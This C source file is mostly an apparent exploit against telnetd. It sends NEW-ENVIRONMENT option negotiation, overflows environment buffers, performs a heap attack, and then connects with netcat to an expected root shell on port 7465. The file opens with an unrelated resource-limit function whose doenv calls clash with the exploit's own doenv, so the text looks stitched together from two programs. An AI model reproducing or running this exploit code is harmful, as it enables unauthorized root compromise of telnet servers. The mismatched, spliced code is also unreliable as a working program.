static void doallenv(void)
{
#ifdef RLIMIT_AS
doenv(RLIMIT_AS,"SOFTLIMIT_ALLBYTES");
doenv(RLIMIT_AS,"SOFTLIMIT_MEMBYTES");
#endif
#ifdef RLIMIT_VMEM
doenv(RLIMIT_VMEM,"SOFTLIMIT_ALLBYTES");
doenv(RLIMIT_VMEM,"SOFTLIMIT_MEMBYTES");
#endif
#ifdef RLIMIT_CORE
doenv(RLIMIT_CORE,"SOFTLIMIT_COREBYTES");
#endif
#ifdef RLIMIT_DATA
doenv(RLIMIT_DATA,"SOFTLIMIT_DATABYTES");
doenv(RLIMIT_DATA,"SOFTLIMIT_MEMBYTES");
#endif
#ifdef RLIMIT_FSIZE
doenv(RLIMIT_FSIZE,"SOFTLIMIT_FILEBYTES");
#endif
#ifdef RLIMIT_MEMLOCK
doenv(RLIMIT_MEMLOCK,"SOFTLIMIT_LOCKEDBYTES");
doenv(RLIMIT_MEMLOCK,"SOFTLIMIT_MEMBYTES");
#endif
#ifdef RLIMIT_STACK
doenv(RLIMIT_STACK,"SOFTLIMIT_STACKBYTES");
doenv(RLIMIT_STACK,"SOFTLIMIT_MEMBYTES");
#endif
#ifdef RLIMIT_NOFILE
doenv(RLIMIT_NOFILE,"SOFTLIMIT_OPENFILES");
#endif
#ifdef RLIMIT_OFILE
doenv(RLIMIT_OFILE,"SOFTLIMIT_OPENFILES");
#endif
#ifdef RLIMIT_NPROC
doenv(RLIMIT_NPROC,"SOFTLIMIT_PROCS");
#endif
#ifdef RLIMIT_RSS
doenv(RLIMIT_RSS,"SOFTLIMIT_RSSBYTES");
#endif
#ifdef RLIMIT_CPU
doenv(RLIMIT_CPU,"SOFTLIMIT_CPUSECS");
#endif
}
main (int argc, char *argv[])
{
int br, l, dosleep = 0;
int percent = 0;
char spin;
unsigned char w;
bzero (oldenv, sizeof (oldenv));
argv++;
dalen = strlen ("clarity.local");
while (argv[0])
{
if (!strcmp (argv[0], "--pause"))
dosleep = 1;
if (!strcmp (argv[0], "--size") && argv[1])
{
mipl = atoi (argv[1]);
argv++;
}
if (!strcmp (argv[0], "--name") && argv[1])
{
dalen = strlen (argv[1]);
argv++;
}
argv++;
}
fprintf (stderr, " o MiPl of %4d o NameLen of %2d\n", mipl, dalen);
if(dalen%3==0)
{
offsets=offset3;
}
else
{
ninbufoffset = mipl % 8192;
offsets[11] += 32 * (mipl - ninbufoffset) / 8192;
if (offsets[11] > 255)
{
fprintf (stderr, " ! MiPl too big.", mipl, dalen);
exit (1);
}
}
sock_setup ();
if (dosleep)
{
system ("sleep 1;ps aux|grep in.telnetd|grep -v grep");
sleep (8);
}
dalen += strlen ("\r\n[ : yes]\r\n");
fprintf (stderr, "o Sending IAC WILL NEW-ENVIRONMENT...\n");
fflush (stderr);
doo (5);
will (39);
fflush (dasock);
read_sock ();
fprintf (stderr, "o Setting up environment vars...\n");
fflush (stderr);
will (1);
push_clean ();
doenv ("USER", "zen-parse");
doenv ("TERM", "zen-parse");
will (39);
fflush (dasock);
fprintf (stderr, "o Doing overflows...\n");
fflush (stderr);
for (br = 0; (offsets[br] || offsets[br + 1]); br += 2)
{
fill (mipl + ENV + offsets[br], offsets[br + 1]);
fflush (dasock);
usleep (100000);
read_sock ();
}
fprintf (stderr, "o Overflows done...\n");
fflush (stderr);
push_clean ();
fprintf (stderr, "o Sending IACs to start login process...\n");
fflush (stderr);
wont (24);
wont (32);
wont (35);
fprintf (dasock, "%s", tosend);
will (1);
push_heap_attack ();
sleep (1);
fprintf (stderr, "o Attempting to lauch netcat to localhost rootshell\n");
execlp ("nc", "nc", "-v", "localhost", "7465", 0);
fprintf (stderr,
"o If the exploit worked, there should be an open port on 7465.\n");
fprintf (stderr, " It is a root shell. You should probably close it.\n");
fflush (stderr);
sleep (60);
exit (0);
}
